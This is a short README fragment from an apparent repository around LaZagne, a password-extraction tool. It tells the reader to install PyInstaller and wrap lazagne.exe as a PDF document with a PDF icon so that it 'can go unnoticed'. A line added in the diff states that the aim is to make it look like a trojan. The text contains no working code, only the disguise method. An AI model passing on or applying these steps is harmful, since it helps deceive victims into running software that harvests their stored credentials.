vic-rono/lazagne/README.md

 `pip install PyInstaller `

 Pyinstaller enables you to wrap the lazagne.exe into a pdf document so that it can go unnoticed.
 The pdf should be wrapped with a pdf icon image.
+To make it look like a [trojan](https://en.wikipedia.org/wiki/Trojan_horse_(computing)).